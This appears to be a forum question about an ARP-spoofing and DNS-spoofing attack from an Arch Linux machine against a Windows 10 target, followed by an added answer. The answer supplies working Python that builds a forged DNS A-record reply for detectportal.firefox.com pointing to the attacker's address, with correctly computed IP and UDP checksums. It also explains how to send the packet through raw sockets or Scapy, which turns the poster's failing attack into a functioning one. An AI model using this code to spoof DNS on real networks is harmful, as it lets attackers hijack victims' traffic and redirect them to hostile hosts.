Spoofed DNS answers ignored by target machine applications


Attacker: Arch Linux

Target: Windows 10

Scenario: The attacker launches an ARP spoofing attack to redirect all target traffic to the attacker machine. (This works.)

The target sends DNS queries for domain name resolution to the attacker machine. (This works.)

The attacker machine listens for these queries and, if the query tries to resolve a specific domain (detectportal.firefox.com), sends a spoofed DNS answer containing the attacker's IP. Queries for all other domains are neither answered nor forwarded.

Wireshark on both the attacker and the target machine confirms that the spoofed DNS answers are received, although the applications that triggered the DNS resolution seem to ignore these answers and just time out.

Example on the target machine:

ipconfig /flushdns
nslookup detectportal.firefox.com
DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  10.42.0.1  (my gateway ip and the ip being spoofed by the ARP attack)

DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
*** Request to UnKnown timed-out

Wireshark confirms that the spoofed DNS answers are well formed and correlates them to the queries.

Assumption:

I do not compute the IP header checksum or the UDP checksum; I just put in some value (e.g. 0xdead, 0xbeef, 0xcafe). Could it be the target machine dropping these packets AFTER Wireshark picks them up?
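An added example, not from the original post, that builds the spoofed answer for detectportal.firefox.com as a raw IPv4/UDP datagram with correctly computed RFC 1071 checksums, builds the same packet with the 0xdead/0xbeef placeholders, and validates both the way a receiving IP stack does. The relevant point: packet capture hooks in before the kernel's checksum validation, so a datagram with a bad IP or UDP checksum appears in Wireshark on the target but is silently discarded before it reaches the socket of nslookup or the browser. A UDP checksum field of exactly 0 is the only "skip" value (IPv4 only); any other wrong value is dropped. The target address 10.42.0.2, the attacker address 10.42.0.10 returned in the answer, the client port and the transaction ID are assumptions chosen for the example.

```python
import socket
import struct
from typing import Optional

# Constructed example values (assumptions, not taken from the post):
# 10.42.0.1 is the spoofed gateway/resolver as in the post; the rest is made up.
GATEWAY_IP = "10.42.0.1"
TARGET_IP = "10.42.0.2"
ATTACKER_IP = "10.42.0.10"   # address handed out in the spoofed A record
CLIENT_PORT = 50000
TXID = 0x1234
QNAME = "detectportal.firefox.com"


def ones_complement_sum(data: bytes) -> int:
    """Sum of big-endian 16-bit words with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data: bytes) -> int:
    """Internet checksum: one's complement of the one's complement sum."""
    return (~ones_complement_sum(data)) & 0xFFFF


def build_dns_answer(txid: int, qname: str, ip: str, ttl: int = 60) -> bytes:
    """Minimal DNS response: the A question echoed back plus one A answer."""
    name = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; 1 Q, 1 A
    question = name + struct.pack("!HH", 1, 1)                   # type A, class IN
    # 0xC00C is a compression pointer to the name at offset 12 (the question)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer


def udp_pseudo_header(src: str, dst: str, udp_len: int) -> bytes:
    """IPv4 pseudo-header that the UDP checksum also covers: src, dst, 0, proto 17, length."""
    return socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 17, udp_len)


def build_packet(src: str, dst: str, sport: int, dport: int, payload: bytes,
                 ip_csum: Optional[int] = None, udp_csum: Optional[int] = None) -> bytes:
    """IPv4 + UDP datagram. Leave ip_csum/udp_csum as None for correct checksums;
    pass bogus values to reproduce the packets described in the post."""
    udp_len = 8 + len(payload)
    if udp_csum is None:
        udp_csum = checksum(udp_pseudo_header(src, dst, udp_len)
                            + struct.pack("!HHHH", sport, dport, udp_len, 0) + payload)
        if udp_csum == 0:      # a computed 0 is transmitted as 0xFFFF; 0 on the wire means "not computed"
            udp_csum = 0xFFFF
    udp = struct.pack("!HHHH", sport, dport, udp_len, udp_csum) + payload

    def ip_header(csum: int) -> bytes:
        return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0x4000,
                           64, 17, csum, socket.inet_aton(src), socket.inet_aton(dst))

    if ip_csum is None:
        ip_csum = checksum(ip_header(0))   # header checksum is computed with the field zeroed
    return ip_header(ip_csum) + udp


def verify_packet(pkt: bytes) -> dict:
    """Check the packet the way the receiving stack does: the one's complement sum over the
    IPv4 header (checksum field included) and over pseudo-header + UDP datagram must fold
    to 0xFFFF. A UDP checksum of 0 means the sender skipped it and is accepted as-is."""
    ihl = (pkt[0] & 0x0F) * 4
    ip_hdr, udp = pkt[:ihl], pkt[ihl:]
    src, dst = socket.inet_ntoa(ip_hdr[12:16]), socket.inet_ntoa(ip_hdr[16:20])
    pseudo = udp_pseudo_header(src, dst, len(udp))
    udp_stored = struct.unpack("!H", udp[6:8])[0]
    return {
        "ip_ok": ones_complement_sum(ip_hdr) == 0xFFFF,
        "udp_ok": udp_stored == 0 or ones_complement_sum(pseudo + udp) == 0xFFFF,
        "ip_stored": struct.unpack("!H", ip_hdr[10:12])[0],
        "ip_expected": checksum(ip_hdr[:10] + b"\x00\x00" + ip_hdr[12:]),
        "udp_stored": udp_stored,
        "udp_expected": checksum(pseudo + udp[:6] + b"\x00\x00" + udp[8:]) or 0xFFFF,
    }


def spoofed_answer(bogus_ip_csum: Optional[int] = None,
                   bogus_udp_csum: Optional[int] = None) -> bytes:
    """The spoofed reply from the (ARP-spoofed) gateway address to the target's query port."""
    dns = build_dns_answer(TXID, QNAME, ATTACKER_IP)
    return build_packet(GATEWAY_IP, TARGET_IP, 53, CLIENT_PORT, dns, bogus_ip_csum, bogus_udp_csum)


if __name__ == "__main__":
    for label, pkt in (("computed checksums", spoofed_answer()),
                       ("0xdead / 0xbeef placeholders", spoofed_answer(0xDEAD, 0xBEEF))):
        r = verify_packet(pkt)
        print(f"{label}: ip_ok={r['ip_ok']} udp_ok={r['udp_ok']}  "
              f"ip stored={r['ip_stored']:#06x} expected={r['ip_expected']:#06x}  "
              f"udp stored={r['udp_stored']:#06x} expected={r['udp_expected']:#06x}")
```

The bytes returned by `spoofed_answer()` can be sent from Linux with a raw socket (`socket.socket(AF_INET, SOCK_RAW, IPPROTO_RAW)`, root required); per raw(7) the Linux kernel always fills in the IPv4 header checksum on such a socket, but it never touches the UDP checksum, so that is the field that has to be right (or exactly 0) in hand-built packets. Scapy users get the same effect by leaving `chksum` unset on the `IP` and `UDP` layers, which makes Scapy compute both on send.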